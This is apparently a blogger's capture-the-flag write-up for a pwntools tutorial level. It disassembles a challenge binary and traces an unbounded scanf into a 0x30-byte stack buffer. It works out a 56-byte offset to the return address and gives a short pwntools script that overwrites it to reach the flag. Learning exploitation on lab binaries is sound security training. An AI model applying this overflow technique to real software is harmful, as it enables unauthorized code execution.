pwntools-level-4.0

SangharshaSangharsha
2 min read

Objective:

In this level, without the aid of source code, use cyclic patterns and core dump analysis to automatically find the return address and exploit a stack overflow to read the /flag file.

Solution:

After analyzing the given file pwntools-tutorials-level4.0 with strings and using gdb i got to know there’s buffer overflow

disas main
Dump of assembler code for function main:
   0x0000000000401f84 <+0>:     endbr64
   0x0000000000401f88 <+4>:     push   %rbp
   0x0000000000401f89 <+5>:     mov    %rsp,%rbp
   0x0000000000401f8c <+8>:     sub    $0x30,%rsp
   0x0000000000401f90 <+12>:    movw   $0x1234,-0x2(%rbp)
   0x0000000000401f96 <+18>:    mov    $0xdeadbeef,%eax
   0x0000000000401f9b <+23>:    mov    %rax,-0x10(%rbp)
   0x0000000000401f9f <+27>:    mov    $0x0,%eax
   0x0000000000401fa4 <+32>:    call   0x401eaa <init>
   0x0000000000401fa9 <+37>:    mov    $0x0,%eax
   0x0000000000401fae <+42>:    call   0x401d9f <print_desc>
   0x0000000000401fb3 <+47>:    lea    0x1221(%rip),%rdi        # 0x4031db
   0x0000000000401fba <+54>:    call   0x4011d0 <puts@plt>
   0x0000000000401fbf <+59>:    lea    -0x30(%rbp),%rax
   0x0000000000401fc3 <+63>:    mov    %rax,%rsi
   0x0000000000401fc6 <+66>:    lea    0x1221(%rip),%rdi        # 0x4031ee
   0x0000000000401fcd <+73>:    mov    $0x0,%eax
--Type <RET> for more, q to quit, c to continue without paging--
   0x0000000000401fd2 <+78>:    call   0x4012b0 <__isoc99_scanf@plt>
   0x0000000000401fd7 <+83>:    mov    $0x0,%eax
   0x0000000000401fdc <+88>:    call   0x401c57 <print_exit>
   0x0000000000401fe1 <+93>:    mov    $0x0,%eax
   0x0000000000401fe6 <+98>:    leave
   0x0000000000401fe7 <+99>:    ret
End of assembler dump.

0x401fbf <+59>: lea    -0x30(%rbp), %rax   # points to buffer
0x401fc3 <+63>: mov    %rax, %rsi           # scanf destination
0x401fc6 <+66>: lea    0x1221(%rip), %rdi   # format string "%s"
0x401fcd <+73>: mov    $0x0, %eax
0x401fd2 <+78>: call   __isoc99_scanf@plt   #  unbounded scanf("%s")   thisis our target

  • Stack frame allocates 0x30 bytes (sub $0x30, %rsp).

  • Input lands at lea -0x30(%rbp), %rax → scanf("%s", rax) → classic unbounded string input.

  • Zero bounds checking. scanf("%s", ...) = straight suicide for them.

Now for finding correct cyclic pattern we need to do some calculation with starting buffer and rip place ,

rbp + 8       # place
rbp - 0x30   ### input buffer

then in final

Offset to RIP: 0x30 + 8 = 56 bytes.

Solution Code:

from pwn import *

context.binary = '/challenge/pwntools-tutorials-level4.0'
elf = context.binary
p = process(elf.path)

offset = 56  
payload = b'A'*offset + p64(0x401f0f)  

p.sendlineafter(b"Give me your input", payload)
p.interactive()

Flag:

0
Subscribe to my newsletter

Read articles from Sangharsha directly inside your inbox. Subscribe to the newsletter, and don't miss out.

pwntoolsreverse engineeringnoob6t5

Written by

Sangharsha
Sangharsha

Aspiring developer and security enthusiast.